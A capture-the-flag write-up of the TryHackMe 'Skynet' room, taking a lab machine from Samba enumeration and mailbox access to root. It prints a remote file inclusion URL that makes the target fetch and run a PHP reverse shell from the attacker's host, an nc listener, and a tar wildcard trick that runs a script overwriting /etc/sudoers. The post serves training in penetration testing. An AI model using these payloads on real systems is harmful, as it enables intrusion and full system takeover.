https://nemodzilla.xyz/categories/tryhackme/Recent content in TryHackMe on Site de NemoHugo -- gohugo.iofrThu, 18 May 2023 00:00:00 +0000https://nemodzilla.xyz/p/tryhackme/Thu, 18 May 2023 00:00:00 +0000https://nemodzilla.xyz/p/tryhackme/<img src="https://nemodzilla.xyz/p/tryhackme/assets/skynet.jpeg" alt="Featured image of post Skynet [Unlocked]" /><p><a class="link" href="https://tryhackme.com/room/skynet" target="_blank" rel="noopener" >Link to the machine</a></p> <h2 id="Answer-1">Answer 1 </h2><p>My target IP : <strong>10.10.84.89</strong></p> <p>We start by simply launching an nmap scan.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"> nmap -sC -sV -oN nmap -O -T4 <span class="o">[</span>@Target_IP<span class="o">]</span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="https://nemodzilla.xyz/p/tryhackme/assets/1.png" width="1800" height="927" srcset="https://nemodzilla.xyz/p/tryhackme/assets/1_hu_462b2ae288d5fa91.png 480w, https://nemodzilla.xyz/p/tryhackme/assets/1_hu_818367ebb14ac922.png 1024w" loading="lazy" alt="Image 1" class="gallery-image" data-flex-grow="194" data-flex-basis="466px" ></p> <p>We can see that 6 services are open, including port 80. We navigate to a web browser to see what it is.</p> <p><img src="https://nemodzilla.xyz/p/tryhackme/assets/2.png" width="1476" height="961" srcset="https://nemodzilla.xyz/p/tryhackme/assets/2_hu_3601d948bfedac44.png 480w, https://nemodzilla.xyz/p/tryhackme/assets/2_hu_b0bc4c4a2d191379.png 1024w" loading="lazy" alt="Image 2" class="gallery-image" data-flex-grow="153" data-flex-basis="368px" ></p> <p>We launch gobuster to discover hidden files or directories.</p> <p><img src="https://nemodzilla.xyz/p/tryhackme/assets/3.png" width="1489" height="897" srcset="https://nemodzilla.xyz/p/tryhackme/assets/3_hu_80803d574b416843.png 480w, https://nemodzilla.xyz/p/tryhackme/assets/3_hu_eb94fca8bf6ebe45.png 1024w" loading="lazy" alt="Image 3" class="gallery-image" data-flex-grow="165" data-flex-basis="398px" ></p> <p>The &ldquo;admin&rdquo; directory is forbidden, so we focus on the &ldquo;squirrelmail&rdquo; directory.</p> <p><img src="https://nemodzilla.xyz/p/tryhackme/assets/4.png" width="1494" height="864" srcset="https://nemodzilla.xyz/p/tryhackme/assets/4_hu_3eaea4b024a5a594.png 480w, https://nemodzilla.xyz/p/tryhackme/assets/4_hu_e7f5f5610432119d.png 1024w" loading="lazy" alt="Image 4" class="gallery-image" data-flex-grow="172" data-flex-basis="415px" ></p> <p>We could attempt a brute force attack, but for now, I prefer to revisit the information provided by nmap, which indicates the presence of a Samba share. To exploit it, we can use the tool &ldquo;enum4linux.&rdquo;</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"> enum4linux 10.10.84.89 </span></span></code></pre></td></tr></table> </div> </div><p><img src="https://nemodzilla.xyz/p/tryhackme/assets/5.png" width="1504" height="913" srcset="https://nemodzilla.xyz/p/tryhackme/assets/5_hu_e3bff40355e27219.png 480w, https://nemodzilla.xyz/p/tryhackme/assets/5_hu_28126db872dd632b.png 1024w" loading="lazy" alt="Image 5" class="gallery-image" data-flex-grow="164" data-flex-basis="395px" ></p> <p>Bingo! We learn two things: anonymous account usage is allowed, and there is also a share named &ldquo;<strong>milesdyson</strong>.&rdquo;</p> <p>Let&rsquo;s connect anonymously and download the content of the &ldquo;milesdyson&rdquo; share.</p> <p><img src="https://nemodzilla.xyz/p/tryhackme/assets/6.png" width="1504" height="478" srcset="https://nemodzilla.xyz/p/tryhackme/assets/6_hu_f51ed86cf142903.png 480w, https://nemodzilla.xyz/p/tryhackme/assets/6_hu_cbd971211b8e630f.png 1024w" loading="lazy" alt="Image 6" class="gallery-image" data-flex-grow="314" data-flex-basis="755px" ></p> <p><img src="https://nemodzilla.xyz/p/tryhackme/assets/7.png" width="1507" height="88" srcset="https://nemodzilla.xyz/p/tryhackme/assets/7_hu_3c69956945f7ef74.png 480w, https://nemodzilla.xyz/p/tryhackme/assets/7_hu_aba4490e4b9a5375.png 1024w" loading="lazy" alt="Image 7" class="gallery-image" data-flex-grow="1712" data-flex-basis="4110px" ></p> <p>We find that &ldquo;log1.txt&rdquo; is a password list.</p> <p>At this stage, we have a list of passwords and a possible username: milesdyson. We try to connect to the mail server using the passwords from this list and the username milesdyson. Success! It was quite fast.</p> <h2 id="Answer-2">Answer 2 </h2><p><img src="https://nemodzilla.xyz/p/tryhackme/assets/8.png" width="1507" height="814" srcset="https://nemodzilla.xyz/p/tryhackme/assets/8_hu_39576098267d1f98.png 480w, https://nemodzilla.xyz/p/tryhackme/assets/8_hu_918dfb01c244bffb.png 1024w" loading="lazy" alt="Image 8" class="gallery-image" data-flex-grow="185" data-flex-basis="444px" ></p> <p>In one of the emails, we find the new password for this user, allowing us to connect to their share.</p> <p><img src="https://nemodzilla.xyz/p/tryhackme/assets/9.png" width="1504" height="457" srcset="https://nemodzilla.xyz/p/tryhackme/assets/9_hu_65961554eb2b1917.png 480w, https://nemodzilla.xyz/p/tryhackme/assets/9_hu_84f443e91cc895fd.png 1024w" loading="lazy" alt="Image 9" class="gallery-image" data-flex-grow="329" data-flex-basis="789px" ></p> <p>In the &ldquo;notes&rdquo; directory, we find the file &ldquo;important.txt.&rdquo;</p> <p><img src="https://nemodzilla.xyz/p/tryhackme/assets/10.png" width="1413" height="396" srcset="https://nemodzilla.xyz/p/tryhackme/assets/10_hu_dc25aa778590e326.png 480w, https://nemodzilla.xyz/p/tryhackme/assets/10_hu_d8b629ec5370e5a6.png 1024w" loading="lazy" alt="Image 10" class="gallery-image" data-flex-grow="356" data-flex-basis="856px" ></p> <p>The document mentions a CMS. Let&rsquo;s see how it looks in the browser.</p> <p><img src="https://nemodzilla.xyz/p/tryhackme/assets/11.png" width="937" height="841" srcset="https://nemodzilla.xyz/p/tryhackme/assets/11_hu_7de4864dad1844b6.png 480w, https://nemodzilla.xyz/p/tryhackme/assets/11_hu_7f1100cffbb82a7.png 1024w" loading="lazy" alt="Image 11" class="gallery-image" data-flex-grow="111" data-flex-basis="267px" ></p> <p>Here is our hidden directory.</p> <h2 id="Answer-3">Answer 3 </h2><p>Not knowing what to do at this stage, I relaunch gobuster on this new address.</p> <p><img src="https://nemodzilla.xyz/p/tryhackme/assets/12.png" width="1506" height="505" srcset="https://nemodzilla.xyz/p/tryhackme/assets/12_hu_c6c20df19e88fe95.png 480w, https://nemodzilla.xyz/p/tryhackme/assets/12_hu_6cbe6060442aa30a.png 1024w" loading="lazy" alt="Image 12" class="gallery-image" data-flex-grow="298" data-flex-basis="715px" ></p> <p><img src="https://nemodzilla.xyz/p/tryhackme/assets/13.png" width="1504" height="1083" srcset="https://nemodzilla.xyz/p/tryhackme/assets/13_hu_620eb304527fd8bf.png 480w, https://nemodzilla.xyz/p/tryhackme/assets/13_hu_8fa1e020b2bd1342.png 1024w" loading="lazy" alt="Image 13" class="gallery-image" data-flex-grow="138" data-flex-basis="333px" ></p> <p>We get something called Cuppa CMS. Let&rsquo;s search if there is a known vulnerability.</p> <p><img src="https://nemodzilla.xyz/p/tryhackme/assets/14.png" width="1504" height="219" srcset="https://nemodzilla.xyz/p/tryhackme/assets/14_hu_e551dd67c2e380c1.png 480w, https://nemodzilla.xyz/p/tryhackme/assets/14_hu_3ec60b24a60cba07.png 1024w" loading="lazy" alt="Image 14" class="gallery-image" data-flex-grow="686" data-flex-basis="1648px" ></p> <p><img src="https://nemodzilla.xyz/p/tryhackme/assets/15.png" width="1504" height="271" srcset="https://nemodzilla.xyz/p/tryhackme/assets/15_hu_adbc35aff68a5169.png 480w, https://nemodzilla.xyz/p/tryhackme/assets/15_hu_f028668b098f0b77.png 1024w" loading="lazy" alt="Image 15" class="gallery-image" data-flex-grow="554" data-flex-basis="1331px" ></p> <blockquote> <p>Remote File Inclusion, let&rsquo;s try to inject a reverse shell.</p> </blockquote> <h2 id="Answer-4">Answer 4 </h2><p>I&rsquo;ll use the one from <a class="link" href="https://github.com/pentestmonkey/php-reverse-shell" target="_blank" rel="noopener" >pentestmonkey</a>.</p> <p>My target IP : <strong>10.10.220.244</strong></p> <p>Remember to modify the address in the script with your own machine&rsquo;s :</p> <p><img src="https://nemodzilla.xyz/p/tryhackme/assets/16.png" width="1306" height="586" srcset="https://nemodzilla.xyz/p/tryhackme/assets/16_hu_4e09968ab185a3df.png 480w, https://nemodzilla.xyz/p/tryhackme/assets/16_hu_d0c3d9610d4858eb.png 1024w" loading="lazy" alt="Image 16" class="gallery-image" data-flex-grow="222" data-flex-basis="534px" ></p> <p>In one terminal, we start the Python server where our script is located.</p> <p>In another terminal, we listen on port 1234 (if you haven&rsquo;t changed it):</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"> nc -lvnp <span class="m">1234</span> </span></span></code></pre></td></tr></table> </div> </div><p>So in a shell :</p> <p><img src="https://nemodzilla.xyz/p/tryhackme/assets/17.png" width="858" height="306" srcset="https://nemodzilla.xyz/p/tryhackme/assets/17_hu_b4e3f2c34286b2eb.png 480w, https://nemodzilla.xyz/p/tryhackme/assets/17_hu_77db4bd6ad46ebf9.png 1024w" loading="lazy" alt="Image 17" class="gallery-image" data-flex-grow="280" data-flex-basis="672px" ></p> <p>And in another :</p> <p><img src="https://nemodzilla.xyz/p/tryhackme/assets/18.png" width="1506" height="240" srcset="https://nemodzilla.xyz/p/tryhackme/assets/18_hu_16def1f430ed7224.png 480w, https://nemodzilla.xyz/p/tryhackme/assets/18_hu_7bc02f57c693a145.png 1024w" loading="lazy" alt="Image 18" class="gallery-image" data-flex-grow="627" data-flex-basis="1506px" ></p> <p>Then, in the web browser:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-http" data-lang="http"><span class="line"><span class="cl"><span class="err"> http://10.10.84.89/[NAME OF HIDDEN DIRECTORY]/administrator/alerts/alertConfigField.php?urlConfig=http://10.10.220.244:8000/php-reverse-shell.php </span></span></span></code></pre></td></tr></table> </div> </div><p><img src="https://nemodzilla.xyz/p/tryhackme/assets/19.png" width="1504" height="325" srcset="https://nemodzilla.xyz/p/tryhackme/assets/19_hu_ec865dac3c4ee34d.png 480w, https://nemodzilla.xyz/p/tryhackme/assets/19_hu_f8aa341ae9b7d228.png 1024w" loading="lazy" alt="Image 19" class="gallery-image" data-flex-grow="462" data-flex-basis="1110px" ></p> <p>The reverse shell is in place!</p> <p><img src="https://nemodzilla.xyz/p/tryhackme/assets/20.png" width="1507" height="145" srcset="https://nemodzilla.xyz/p/tryhackme/assets/20_hu_c8b4904ad5b4dcd9.png 480w, https://nemodzilla.xyz/p/tryhackme/assets/20_hu_d5c0a48c0209c676.png 1024w" loading="lazy" alt="Image 20" class="gallery-image" data-flex-grow="1039" data-flex-basis="2494px" ></p> <p><img src="https://nemodzilla.xyz/p/tryhackme/assets/21.png" width="1504" height="202" srcset="https://nemodzilla.xyz/p/tryhackme/assets/21_hu_c6c4b7cafb3b5845.png 480w, https://nemodzilla.xyz/p/tryhackme/assets/21_hu_6c9423bec607d109.png 1024w" loading="lazy" alt="Image 21" class="gallery-image" data-flex-grow="744" data-flex-basis="1786px" ></p> <h2 id="Answer-5">Answer 5 </h2><p>Now it&rsquo;s time to escalate privileges.</p> <p><img src="https://nemodzilla.xyz/p/tryhackme/assets/22.png" width="1501" height="313" srcset="https://nemodzilla.xyz/p/tryhackme/assets/22_hu_ae37690c6336140a.png 480w, https://nemodzilla.xyz/p/tryhackme/assets/22_hu_f365ea4584df7a27.png 1024w" loading="lazy" alt="Image 22" class="gallery-image" data-flex-grow="479" data-flex-basis="1150px" ></p> <p>I can&rsquo;t use the &ldquo;sudo -l&rdquo; command, so I decide to take a look at the crontab, and there we find an interesting file.</p> <p><img src="https://nemodzilla.xyz/p/tryhackme/assets/23.png" width="1506" height="739" srcset="https://nemodzilla.xyz/p/tryhackme/assets/23_hu_991893e9f877a864.png 480w, https://nemodzilla.xyz/p/tryhackme/assets/23_hu_cfba0a65504b84e7.png 1024w" loading="lazy" alt="Image 23" class="gallery-image" data-flex-grow="203" data-flex-basis="489px" ></p> <p>I&rsquo;ll check <a class="link" href="https://gtfobins.github.io/gtfobins/tar/" target="_blank" rel="noopener" >GTFOBins</a> to see if we can do something with that &ldquo;tar&rdquo; command executed as root.</p> <p><img src="https://nemodzilla.xyz/p/tryhackme/assets/24.png" width="1291" height="418" srcset="https://nemodzilla.xyz/p/tryhackme/assets/24_hu_f21d07efad75a7ec.png 480w, https://nemodzilla.xyz/p/tryhackme/assets/24_hu_a595b0d6c0d7b863.png 1024w" loading="lazy" alt="Image 24" class="gallery-image" data-flex-grow="308" data-flex-basis="741px" ></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="nb">echo</span> <span class="s1">&#39;echo &#34;www-data ALL=(root) NOPASSWD: ALL&#34; &gt; /etc/sudoers&#39;</span> &gt; privesc.sh </span></span><span class="line"><span class="cl"><span class="nb">echo</span> <span class="s2">&#34;/var/www/html&#34;</span> &gt; <span class="s2">&#34;--checkpoint-action=exec=sh privesc.sh&#34;</span> </span></span><span class="line"><span class="cl"><span class="nb">echo</span> <span class="s2">&#34;/var/www/html&#34;</span> &gt; --checkpoint<span class="o">=</span><span class="m">1</span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="https://nemodzilla.xyz/p/tryhackme/assets/25.png" width="1504" height="238" srcset="https://nemodzilla.xyz/p/tryhackme/assets/25_hu_55d9c47048593c51.png 480w, https://nemodzilla.xyz/p/tryhackme/assets/25_hu_5517414ab73cb517.png 1024w" loading="lazy" alt="Image 25" class="gallery-image" data-flex-grow="631" data-flex-basis="1516px" ></p> <p>After 1 minute :</p> <p><img src="https://nemodzilla.xyz/p/tryhackme/assets/26.png" width="1503" height="226" srcset="https://nemodzilla.xyz/p/tryhackme/assets/26_hu_8350583a019b0443.png 480w, https://nemodzilla.xyz/p/tryhackme/assets/26_hu_6fcb20d27fdf47d0.png 1024w" loading="lazy" alt="Image 26" class="gallery-image" data-flex-grow="665" data-flex-basis="1596px" ></p> <p><img src="https://nemodzilla.xyz/p/tryhackme/assets/27.png" width="1501" height="198" srcset="https://nemodzilla.xyz/p/tryhackme/assets/27_hu_ffb1140bab4eed29.png 480w, https://nemodzilla.xyz/p/tryhackme/assets/27_hu_1333eeba18b4b3ab.png 1024w" loading="lazy" alt="Image 27" class="gallery-image" data-flex-grow="758" data-flex-basis="1819px" ></p>